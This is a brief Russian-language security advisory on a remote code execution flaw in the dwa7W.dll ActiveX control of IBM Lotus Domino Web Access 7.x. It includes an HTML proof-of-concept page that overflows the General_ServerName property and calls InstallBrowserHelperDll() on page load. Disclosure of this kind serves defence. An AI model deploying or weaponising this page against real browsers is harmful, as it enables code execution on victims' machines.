Программа:
IBM Lotus Domino 7.x
IBM Lotus Domino Web Access 7.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в dwa7.dwa7.1 ActiveX компоненте (dwa7W.dll) при обработке строки, назначенной свойству "General_ServerName". Атакующий может передать специально сформированную строку уязвимому свойству и затем вызвать метод InstallBrowserHelperDll(), что приведет к выполнению произвольного кода.
Пример:
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 12000) s = s + 'A';
obj.General_ServerName = s;
obj.InstallBrowserHelperDll();
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />
</object>
</body>
</html>